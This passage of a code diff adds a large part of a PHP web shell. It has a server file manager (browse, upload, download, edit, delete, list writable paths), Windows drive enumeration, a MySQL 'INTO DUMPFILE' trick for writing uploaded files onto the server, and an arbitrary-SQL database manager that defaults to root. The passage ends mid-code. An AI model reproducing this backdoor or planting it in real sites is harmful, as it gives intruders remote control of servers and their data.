+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
+
+	$cwd_links = '';
+	$path = explode('/', $nowpath);
+	$n=count($path);
+	for($i=0;$i<$n-1;$i++) {
+		$cwd_links .= '<a href="javascript:godir(\'';
+		for($j=0;$j<=$i;$j++) {
+			$cwd_links .= $path[$j].'/';
+		}
+		$cwd_links .= '\');">'.$path[$i].'/</a>';
+	}
+
+?>
+<script type="text/javascript">
+document.onclick = shownav;
+function shownav(e){
+	var src = e?e.target:event.srcElement;
+	do{
+		if(src.id =="jumpto") {
+			$('inputnav').style.display = "";
+			$('pathnav').style.display = "none";
+			//hidenav();
+			return;
+		}
+		if(src.id =="inputnav") {
+			return;
+		}
+		src = src.parentNode;
+	}while(src.parentNode)
+
+	$('inputnav').style.display = "none";
+	$('pathnav').style.display = "";
+}
+</script>
+<div style="background:#eee;margin-bottom:10px;">
+	<table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
+		<tr>
+			<td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
+			<td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
+		</tr>
+	</table>
+	<table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
+	<form action="" method="post" id="godir" name="godir">
+		<tr>
+			<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+			<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
+			<td nowrap><input class="bt" value="GO" type="submit"></td>
+		</tr>
+	</form>
+	</table>
+<?php
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj) && $obj->Drives) {
+			echo '<div class="drives">';
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			$comma = '';
+			foreach($obj->Drives as $drive) {
+				if ($drive->Path) {
+					p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+					$comma = '<span>|</span>';
+				}
+			}
+			echo '</div>';
+		}
+	}
+?>
+</div>
+<?php
+	$findstr = $_POST['findstr'];
+	$re = $_POST['re'];
+	tbhead();
+	p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+
+	p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//查看所有可写文件和目录
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable == 'dir') {
+		$dirdata = GetWDirList($nowpath);
+		$filedata = array();
+	} elseif ($view_writable == 'file') {
+		$dirdata = array();
+		$filedata = GetWFileList($nowpath);
+	} elseif ($findstr) {
+		$dirdata = array();
+		$filedata = GetSFileList($nowpath, $findstr, $re);
+	} else {
+		// 目录列表
+		//scandir()效率更高
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			if($getdir && $getdir == $dirdb['server_link']) {
+				$attachsize = dirsize($dirdb['server_link']);
+				$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+			} else {
+				$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
+			}
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
+			p('<td nowrap>'.$attachsize.'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	$file_i = '0';
+
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
+			p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
+			p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'mysqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				foreach($table as $k => $v) {
+					if ($v) {
+						sqldumptable($v, $fp);
+					}
+				}
+				fclose($fp);				
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','mysqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	//操作记录
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','mysqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//选定数据库
+	formhead(array('name'=>'setdbname'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//选定表
+	formhead(array('name'=>'settable'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//获取数据库信息
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//获取数据库
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','mysqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW FULL COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<h3>Structure</h3>');
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Collation</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('<td>Privileges</td>');
+					p('<td>Comment</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Collation'].'&nbsp;</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('<td>'.$row['Privileges'].'&nbsp;</td>');
+						p('<td>'.$row['Comment'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+					$result = q("SHOW INDEX FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<h3>Indexes</h3>');
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Keyname</td>');
+					p('<td>Type</td>');
+					p('<td>Unique</td>');
+					p('<td>Packed</td>');
+					p('<td>Seq_in_index</td>');
+					p('<td>Field</td>');
+					p('<td>Cardinality</td>');
+					p('<td>Collation</td>');
+					p('<td>Null</td>');
+					p('<td>Comment</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Key_name'].'</td>');
+						p('<td>'.$row['Index_type'].'</td>');
+						p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
+						p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
+						p('<td>'.$row['Seq_in_index'].'</td>');
+						p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
+						p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
+						p('<td>'.$row['Collation'].'&nbsp;</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Comment'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','mysqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
+						} else {							
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+						}
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+
+									/*********************/
+									$getfield = q("SHOW COLUMNS FROM $tablename");
+									$rowdb = array();
+									$keyfied = ''; //主键字段
+									while($row = @mysql_fetch_assoc($getfield)) {
+										$rowdb[$row['Field']]['Key'] = $row['Key'];
+										$rowdb[$row['Field']]['Extra'] = $row['Extra'];
+										if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
+											$keyfied = $row['Field'];
+										}
+									}
+									/*********************/								
+									//直接浏览表按照主键降序排列
+									if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
+										$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
+									}
+
+									$result = q($query);
+
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										//选取条件字段用
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												//查找主键、唯一属性、自动增加的字段，找到就停止，否则组合所有字段作为条件。
+												if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
+													$where = $key."='".addslashes($inside)."'";
+													break;
+												}
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+										}
+										//读取记录用
+										foreach($mn as $key=>$inside){
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									tbfoot();
+									p($multipage);
+									break;
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','mysqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center">&nbsp;</td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'&nbsp;</td>');
+					p('<td>'.$table['Update_time'].'&nbsp;</td>');
+					if ($highver) {
